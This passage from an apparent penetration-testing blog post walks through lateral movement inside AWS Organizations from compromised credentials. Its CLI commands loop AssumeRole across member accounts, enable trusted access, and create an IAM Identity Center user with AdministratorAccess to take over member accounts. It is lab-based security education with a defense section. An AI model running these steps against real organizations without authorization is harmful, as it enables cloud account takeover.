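# Attempting to list it as Account B fails with an AccessDenied error by default
aws s3 ls s3://example-boundary-demo-bucket --profile account-b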

AWS Organizations Vocabulary

Before we dive into organizations, let’s run through some quick vocabulary. AWS Organizations is an AWS service where customers can create “organizations.” An organization is composed of one or more individual AWS accounts. In Figure 2 below, Account A is the account that created the organization and, as such, is called the management account.

The management account has administrator-like privileges over the entire organization. It can invite other AWS accounts, remove AWS accounts, delete an organization, attach policies, and more. In Figure 2, Account A invited Account B and Account C to join its organization. Accounts B and C are still separate AWS accounts, but by accepting Account A’s invitation their references appear in Account A’s organization entity. Once the invite is accepted, Accounts B and C become member accounts and, by default, have significantly fewer privileges than the management account.

A default member account can only view a few pieces of info associated with the management account. It cannot read other organization info, nor can it make changes in the organization. Default member accounts are so isolated that they do not have visibility into what other member accounts exist within the organization, only seeing themselves and the management account number. 
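
As a quick, hedged illustration of this isolation (the profile name is a placeholder for the compromised member account credentials):

# DescribeOrganization works from a member account and reveals the management account number
aws organizations describe-organization --profile member-account

# Listing the other accounts is typically denied for a default member account
aws organizations list-accounts --profile member-account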

Organizational Units (OUs) can be thought of as customer-created “folders” that you can use for arranging account resources. Root is a special entity that appears in every AWS Organization and can be thought of as functionally equivalent to an OU under which all accounts exist.

A diagram of our sample organization is given in Figure 2. Account ***********0 (Account A) is the account in charge of managing the overall organization, Account ***********9 (Account B) is a member account holding pre-production data, and Account ***********6 (Account C) is a member account holding production data. Account B has a highlighted overly permissive role with a trust access policy set to *. For steps to set up an organization, refer to the AWS user guide.

Figure 2: AWS Organization Lab Layout

Finally, note that navigating to AWS Organizations in a management account like Account A provides a different UI layout than in a member account like Account C (Figure 3 versus Figure 4). Most noticeably, the lefthand navigation bar differs. Because member accounts have significantly fewer permissions with regard to the organization, navigating to “AWS Accounts” or “Policies” in a default member account returns permission errors, as expected. These differences can help testers determine whether they have access to a management or a member account during AWS pentesting.

Figure 3: AWS Management Account Organizations UI
Figure 4: AWS Member Account Organizations UI

Easy Win with Account Creation

In Figure 2, and throughout most of this two-part series, we assume the member accounts in the organization were all pre-existing accounts added through individual invites. However, we will take a quick detour from this assumption to look at the AWS account creation feature, as it can yield an easy early win. This is shown in Figure 5.

Figure 5: AWS Account Creation Pivot

Account A can choose to create an AWS account when adding it to the organization (as opposed to inviting a pre-existing AWS account like Accounts B and C). When this is done, AWS creates a specific role with the default name OrganizationAccountAccessRole in the newly created member account. We will denote this newly created member account as Account D.

Figure 6: Account Creation Workflow

If we were to view the newly created OrganizationAccountAccessRole role in Account D, we would see that the role has AdministratorAccess attached to it and trusts the management account, Account A.

Figure 7: Account D’s OrganizationAccountAccessRole Trust Policy

Thus, if we compromise credentials for a user/role with the necessary privileges in Account A, we can go through each member account in the AWS Organization and try to assume this default role name. A successful attempt returns credentials, as seen below (Figure 8), allowing us to pivot from Account A to Account D essentially as an administrator.

Figure 8: Using Account A to AssumeRole OrganizationAccountAccessRole in Account D
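
Expressed as a hedged CLI sketch (assuming the compromised Account A credentials are in the active profile, and that member accounts use the default role name), the loop might look like:

# Enumerate member accounts, then attempt the default role in each one
for ACCOUNT_ID in $(aws organizations list-accounts --query 'Accounts[].Id' --output text); do
  aws sts assume-role --role-arn "arn:aws:iam::${ACCOUNT_ID}:role/OrganizationAccountAccessRole" --role-session-name "org-pivot-check" >/dev/null 2>&1 && echo "[+] AssumeRole succeeded in ${ACCOUNT_ID}"
done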

Again, this is the “easy win” scenario, where you can go from relative control of a management account to administrator control of a member account. However, this might not be feasible if a default role is not present in the member accounts, if you lack the necessary permissions, or if the member account was invited instead of created. In those cases, trusted access and delegated administration are the next two features to consider.

Trusted Access and Delegated Administration Review

A handful of AWS services have specific features or API subsets that integrate with AWS Organizations (ex. IAM Access Analyzer), allowing their functionality to expand from a single AWS account to the entire organization. These organization-integrated features are in what we might consider an “off” state by default.

Figure 9: Trusted Access & Delegated Administration Visualized

Per AWS, trusted access is when you “enable a compatible AWS service to perform operations across all of the AWS accounts in your organization.” In other words, you can think of trusted access as the “on” switch for these feature integrations. You “trust” the specific integrated feature thereby giving it “trusted access” to the organization data and associated accounts. The exact mechanism by which the feature operations are then carried out might involve service-linked roles created in each relevant account, but we will not examine this too closely for the purpose of this article. Just know trusted access generally grants the feature access to the entire organization.

Figure 9 demonstrates an expected trusted access workflow. Account A “enables” trusted access for one of the predefined organization-supported features which can then access the necessary management/member account resources. From this point onwards, the ability to influence/access/change the associated member accounts is feature specific with Access Analyzer, for example, choosing to access and scan each member account in the organization for trust violations. Enabling a feature like IAM Access Analyzer from the management account means it is an enabled service.

Delegated administration is a status applied to member accounts that gives the targeted member account “read-only access to AWS Organizations service data.” This allows the member to perform actions like listing the organization’s AWS accounts, which was previously blocked per the UI errors in Figure 4. Additionally, the management account “delegates” permissions to the member account with regard to a specific organization-integrated feature, such that the member account now has the permissions to run that feature on the entire organization from within its own account.

Delegated administration is illustrated by the blue lines in the diagram above (Figure 9). Account A would make Account C a delegated administrator specifically for IAM Access Analyzer, and Account C could then run IAM Access Analyzer on the entire organization. Making a member account a delegated administrator for certain services like IAM Access Analyzer means Access Analyzer is a delegated service in Account C.

Trusted access and delegated administration are extremely feature-specific concepts, and not every organization-integrated feature supports both trusted access and delegated administrators. Learn more about the services you can use with AWS Organizations here.

Leveraging IAM Access Analyzer through Trusted Access

Let’s assume we have compromised credentials for Account A. We could end the attack here, but looking at AWS Organizations we would see the additional AWS Accounts B and C listed as member accounts. While we have no credentials for, or visibility into, either member account, we can use our organization permissions from Account A to enable trusted access for a service (or use an already-enabled service). This will allow us to gather data on the member accounts.

IAM Access Analyzer reviews the roles in an AWS account and tells you if any role trust relationships reach outside a “trust zone.” For example, if you have a role in an AWS account that allows any other AWS account to assume it, that role would get flagged as violating the trust zone since “any AWS account” is a much larger scope than a single AWS account. 

When integrated with AWS Organizations, the Access Analyzer associated trust zone (and as a byproduct, scan range) expands to the entire organization. By giving IAM Access Analyzer trusted access in Account A, we can let the Analyzer scan each member account in the organization and return a report that would include Account B’s vulnerable role.

Before we begin, let’s review each account’s IAM roles. Note that we only have access to Account A’s info, but both role lists are provided here for transparency. Account B has the role with the trusted entity of * that we want to both discover and exploit as Account A.

Figure 10: Account A & Account B Starting IAM Roles Before Exploitation

As the attacker in Account A, navigate to “Services” in AWS Organizations and observe that IAM Access Analyzer is disabled by default. While we could use the UI controls to enable the organization-integrated feature, we can also use the AWS Command Line Interface (CLI) with the leaked credentials, as sketched below.
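
A minimal sketch of the CLI route (the service principal matches the Appendix entry, and the leaked Account A credentials are assumed to be in the active profile):

# Enable trusted access for IAM Access Analyzer across the organization
aws organizations enable-aws-service-access --service-principal access-analyzer.amazonaws.com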

Next, navigate to the IAM Access Analyzer feature within the IAM service and create an analyzer. Since Access Analyzer is now an enabled service, we can set the “Zone of trust” to the entire organization.

Figure 12: Creating an Access Analyzer

After a few minutes, refresh the page and observe that the overly trusting role from Account B is listed as an active finding, demonstrating an indirect avenue for collecting Account B data as an Account A entity.

Figure 13: Gathering Vulnerabilities in Account B as Account A

To complete the POC, observe how the attacker in Account A can take the knowledge from the vulnerability scan (specifically, the role ARN) and assume the role in Account B, thus pivoting within the organization.

Figure 14: Using Account A to AssumeRole RoleToListS3Stuff in Account B
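
In CLI form, the pivot might look like the following hedged one-liner, where the role ARN comes directly from the Access Analyzer finding (the account number is a placeholder):

# Assume the flagged role using the ARN from the finding
aws sts assume-role --role-arn "arn:aws:iam::[account number]:role/RoleToListS3Stuff" --role-session-name "analyzer-finding-poc"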

While not critical to the attacker steps listed above, reviewing both accounts again shows that a new role, AWSServiceRoleForAccessAnalyzer, was created by the service and used in each member account per the organization-integrated feature.

Figure 15: Account A & Account B IAM Roles After Exploitation

Leveraging IAM Access Analyzer Through Delegated Administration

To demonstrate delegated administrator exploitation regarding Access Analyzer, we need to enable delegated administration in our current organization environment. To do so from Account A, navigate to Account A’s Access Analyzer feature, choose to add a delegated administrator, and enter Account C’s account number.

Figure 16: Using Account A to Make Account C a Delegated Administrator

Now assume that we have compromised credentials for Account C (as opposed to Account A), and that we have no starting knowledge of the organization. As Account C, we can navigate to the AWS Organizations service and conclude that we are probably a member account, since the management account number (shown under the Dashboard tab) does not match our compromised account number and the general UI layout is not that of a management account.

However, unlike a default member account, the “AWS Accounts” tab now returns all AWS accounts in the organization instead of permission denied errors. Remember that one of the first things a delegated administrator gets is read-only rights to the organization. Thus, we can further hypothesize that we are not just a default member account, but a delegated administrator.

Figure 17: Viewing Organization Info as Account C

But a delegated administrator for what? Since there is no centralized UI component in a member account that lists all delegated services, we would need to browse to each organization-integrated feature in Account C (IAM Access Analyzer, S3 Storage Lens, etc.), where the UI will hopefully tell us if we are the delegated administrator for that feature.

This is very cumbersome; instead, we can leverage the CLI commands in the Appendix of this blog, along with our delegated administrator read-only rights, to speed up identification, as seen below. First, we call “list-delegated-administrators” to reconfirm our earlier hypothesis that Account C is a delegated administrator. We can then list all delegated services for ourselves by passing our own account number to “list-delegated-services-for-account.” In this case, Access Analyzer (access-analyzer.amazonaws.com) is listed as the delegated service.

Figure 18: Listing Delegated Administrators & Delegated Services as Account C
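
The corresponding commands, also listed in the Appendix, might look like the following hedged sketch (the account number placeholder is Account C’s own ID):

# Confirm our delegated administrator status
aws organizations list-delegated-administrators

# List the delegated services for our own account
aws organizations list-delegated-services-for-account --account-id [account number]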

From here, finding the overly trusting role in Account B plays out much the same way as in the trusted access example. We create an analyzer in Account C (now with the option to choose the entire organization due to the delegated administrator status), wait for the results, and identify the overly trusting role in Account B. Note that during setup, my first analyzer did not pick up the role immediately, so deleting the old analyzer and creating a new one seems to be a good debugging step.

Figure 19: Gathering Vulnerabilities in Account B as Account C

While the previous example started from the perspective of a compromised management account, delegated administration shows how a member account can still leverage organization-integrated features to access/analyze/change member accounts in the overall organization.

IAM Identity Center (Successor to SSO) – Complete Control/Movement over Member Account

IAM Identity Center can be thought of as another “easy win,” where one can authenticate to any selected member account, allowing for full account takeover. While the service does support delegated administration, we will focus on trusted access. Once again, we assume that you, as an attacker, have compromised credentials for Account A and are in complete control of the management account.

Navigate to the IAM Identity Center service and choose to “Enable” it. This is the equivalent of enabling trusted access, and listing enabled services now returns IAM Identity Center as “sso.amazonaws.com” (a quick CLI check follows Figure 20).

Figure 20: Enabling the IAM Identity Center Service
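
As a quick, hedged CLI check (the expected output line is abbreviated and hypothetical):

# List enabled services; IAM Identity Center should now appear
aws organizations list-aws-service-access-for-organization

# Expected to include an entry similar to:
#   "ServicePrincipal": "sso.amazonaws.com"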

Glancing over IAM Identity Center, we can see that AWS Organizations is embedded within the service under “AWS accounts”, and that we have the option to create users with associated permission sets. A user entity can be used to sign into the AWS access portal URL, and a permission set defines what that user can do in terms of IAM privileges. To get into any member account in AWS Organizations, we will create a user with a one-time password (OTP), create a permission set allowing access to all actions/resources, attach the user and permission set to the target member account, and then authenticate as that user to access the member account.

Figure 21: IAM Identity Center Dashboard

Create a user as shown below in Figure 22. Note that we choose the option to “generate a one-time password.” Instead of generating an OTP, we could also choose to send an email invitation to create the user.

Figure 22: Creating a User Workflow

At the end of the user creation workflow, we are given an OTP and a sign-in link. Note this access portal URL is the same URL displayed on the main dashboard page of IAM Identity Center.

Figure 23: Saving One-Time Password for New User

Next, create a permission set. Think of permission sets as wrappers for IAM policies: we can wrap AWS-managed, customer-managed, or inline IAM policies in each permission set via the “Custom permission set” workflow. For simplicity’s sake, we will choose a “Predefined permission set” that already includes the equivalent of the AdministratorAccess policy. While permission sets encapsulate IAM policies, they are not the same entity and have their own ARN format.

Figure 24: Creating Permission Set Workflow

Now that we have our user and permission set, we can assign the user to log into any member account in our organization via the “AWS accounts” item in the lefthand navigation bar.

Figure 25: Attaching a User/Permission Set to Account Workflow

Now that the user is assigned to the member account, navigate to the sign-in URL from earlier and enter the username/OTP combination, following the login prompts.

Figure 26: Authenticate as User Workflow

Observe that, post-authentication, we are presented with a portal containing links for accessing the member AWS account via the UI or via direct credentials. Clicking the UI option takes us into the AWS console for Account C, where we can see we are the user with the AdministratorAccess permission set. Thus, we have turned a takeover of one AWS account into a takeover of two. We could also run the exact same attack against Account B, allowing a complete takeover of every AWS account in the organization.

Figure 27: Sign into Member Account as AdministratorAccess User

It is worth mentioning that the service can be configured to automatically email OTPs upon user creation, which avoids most UI interaction. However, turning on this setting itself requires access to the UI, so some UI interaction appears unavoidable. Once automated OTP emails are set up, you can create the user and permission set via the CLI and immediately try to sign in via the sign-in URL using the username (not the user’s email). An email containing the OTP is then sent to the address associated with that username.

Figure 28: Alternative Sign In Technique

Defense

The scenarios above started with the prerequisite that management or member account credentials had been compromised. Thus, the pivoting techniques listed above do not represent an inherent flaw in AWS itself, but rather potential attack vectors if certain access is gained through leaked credentials, insider threats, etc. Users can take several actions to help defend against attacker movement in their organizations, including:

  • Adhere to the principle of least privilege at the IAM level. Ideally, users in the AWS environment should only have the permissions necessary to do their jobs. With these granular controls, if an account were compromised, the attacker might not be able to pivot any further into the environment.
  • Adhere to the principle of least privilege at the service level. Ensure that organization-integrated features with trusted access or delegated administration are actually needed and used; leaving these features enabled when they are not needed introduces an unnecessary blast radius (see the audit sketch after this list).
  • Protect credentials, especially those for management accounts and delegated administrators. As seen above, these two positions can grant access to an entire organization, so the associated AWS keys should be carefully protected and maintained.
  • Ensure proper logging infrastructure is in place so that Organizations actions are properly documented and monitored.
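
As a starting point for the service-level review above, here is a hedged audit/cleanup sketch; the service principal and account number are placeholders, and deregistering/disabling should only be done for integrations confirmed to be unneeded:

# Review which organization-integrated services are enabled or delegated today
aws organizations list-aws-service-access-for-organization
aws organizations list-delegated-administrators

# Remove an unneeded delegation, then disable the trusted access itself
aws organizations deregister-delegated-administrator --account-id [member account number] --service-principal access-analyzer.amazonaws.com
aws organizations disable-aws-service-access --service-principal access-analyzer.amazonaws.com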

AWS’s own documentation provides further guidance on the points discussed above. Alternatively, connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.

Conclusion

This article covers conceptual knowledge and demonstrates actual mechanisms for pivoting within an AWS Organization. Note that we only covered IAM Access Analyzer and IAM Identity Center; there are many other organization-integrated features.

If you are on an assessment without an easy AssumeRole path into member accounts and you see an enabled organization feature, we highly encourage reviewing that feature’s documentation for possible pivoting techniques.

In part two of this blog series, we will review one more organization-integrated feature, a recent Organizations service update, and a tool I created and pushed to Pacu that enumerates everything discussed above in one command.

Appendix: CLI Commands

Below is a summary of the important CLI commands that were used directly or leveraged through the UI. I have also included two example CLI workflows, for Access Analyzer and Identity Center, referenced above. As mentioned, Identity Center involves a mix of UI-only functionality and CLI commands unless the OTP auto-email setting has been configured.

# Base Organization Read APIs

aws organizations describe-organization
aws organizations list-roots
aws organizations list-accounts
aws organizations list-aws-service-access-for-organization
aws organizations list-delegated-administrators
aws organizations list-delegated-services-for-account --account-id [account number]
aws organizations list-organizational-units-for-parent --parent-id [OU/root ID]

# Base Organization Mutate APIs

aws organizations enable-aws-service-access --service-principal [principal designated URL]
aws organizations register-delegated-administrator --account-id [account number] --service-principal [principal designated URL]

# Create Analyzer

└─$ aws accessanalyzer create-analyzer --analyzer-name "TestAnalyzer" --type "ORGANIZATION" --profile Orchestrator --region us-east-1
{
    "arn": "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer"
}

# List Access Analyzer Findings

└─$ aws accessanalyzer list-findings --analyzer-arn "arn:aws:access-analyzer:us-east-1:[REDACTED]0:analyzer/TestAnalyzer" --profile Orchestrator --region us-east-1
{
    "findings": [
        {
            "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
            "principal": {
                "AWS": "*"
            },
            "action": [
                "sts:AssumeRole"
            ],
            "resource": "arn:aws:iam:: [REDACTED]6:role/RoleToListS3Stuff",
            "isPublic": true,
            "resourceType": "AWS::IAM::Role",
            "condition": {},
            "createdAt": "2022-12-21T04:29:13.377000+00:00",
            "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
            "updatedAt": "2022-12-21T04:29:13.377000+00:00",
            "status": "ACTIVE",
            "resourceOwnerAccount": "579735764396"
        }
    ]
}

# Get Specific Analyzer Finding

└─$ aws accessanalyzer get-finding --analyzer-arn "arn:aws:access-analyzer:us-east-1:[REDACTED]0:analyzer/TestAnalyzer" --id "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c" --profile Orchestrator --region us-east-1
{
    "finding": {
        "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
        "principal": {
            "AWS": "*"
        },
        "action": [
            "sts:AssumeRole"
        ],
        "resource": "arn:aws:iam::[REDACTED]6:role/RoleToListS3Stuff",
        "isPublic": true,
        "resourceType": "AWS::IAM::Role",
        "condition": {},
        "createdAt": "2022-12-21T04:29:13.377000+00:00",
        "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
        "updatedAt": "2022-12-21T04:29:13.377000+00:00",
        "status": "ACTIVE",
        "resourceOwnerAccount": "579735764396"
    }
}

# IAM Identity Center Example Workflow

# Get instance ID

└─$ aws sso-admin list-instances --profile Orchestrator --region us-west-2
{
    "Instances": [
        {
            "InstanceArn": "arn:aws:sso:::instance/ssoins-7907a1fb914efa94",
            "IdentityStoreId": "d-92676f572a"
        }
    ]
}

# Create user. Note the password is not returned via the CLI; one needs to either get it from the UI via “Reset Password” on the new user or have the OTP auto-email setting configured.

└─$ aws identitystore create-user --profile Orchestrator --region us-west-2 --identity-store-id "d-92676f572a" --name "Formatted=FormattedValue,GivenName=GivenNameValue,FamilyName=FamilyNameValue" --user-name "Username" --display-name "TEST" --emails "Value=[REDACTED]@gmail.com,Type=Work,Primary=True"
{
    "UserId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
    "IdentityStoreId": "d-92676f572a"
}

# Create Permission Set

└─$ aws sso-admin create-permission-set --name "PermissionSetOne" --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --session-duration "PT12H" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}
└─$ aws sso-admin attach-managed-policy-to-permission-set --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" --profile Orchestrator --region us-west-2
{
    "PermissionSet": {
        "Name": "PermissionSetOne",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "CreatedDate": "2022-12-18T19:51:37.664000-05:00",
        "SessionDuration": "PT12H"
    }
}

# Attach permission set and user to account. Check status of provision.

└─$ aws sso-admin create-account-assignment --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --target-id "[REDACTED]6" --target-type "AWS_ACCOUNT" --permission-set-arn "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994" --principal-type "USER" --principal-id "d81153b0-9051-709f-f49e-b6d9ec91f892" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "IN_PROGRESS",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892"
    }
}
└─$ aws sso-admin describe-account-assignment-creation-status --instance-arn "arn:aws:sso:::instance/ssoins-7907a1fb914efa94" --account-assignment-creation-request-id "c6f6afee-efd2-4cad-a52e-58d937184b52" --profile Orchestrator --region us-west-2
{
    "AccountAssignmentCreationStatus": {
        "Status": "SUCCEEDED",
        "RequestId": "c6f6afee-efd2-4cad-a52e-58d937184b52",
        "TargetId": "[REDACTED]6",
        "TargetType": "AWS_ACCOUNT",
        "PermissionSetArn": "arn:aws:sso:::permissionSet/ssoins-7907a1fb914efa94/ps-a8a74ca5fd800994",
        "PrincipalType": "USER",
        "PrincipalId": "d81153b0-9051-709f-f49e-b6d9ec91f892",
        "CreatedDate": "2022-12-18T19:57:22.335000-05:00"
    }
}

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>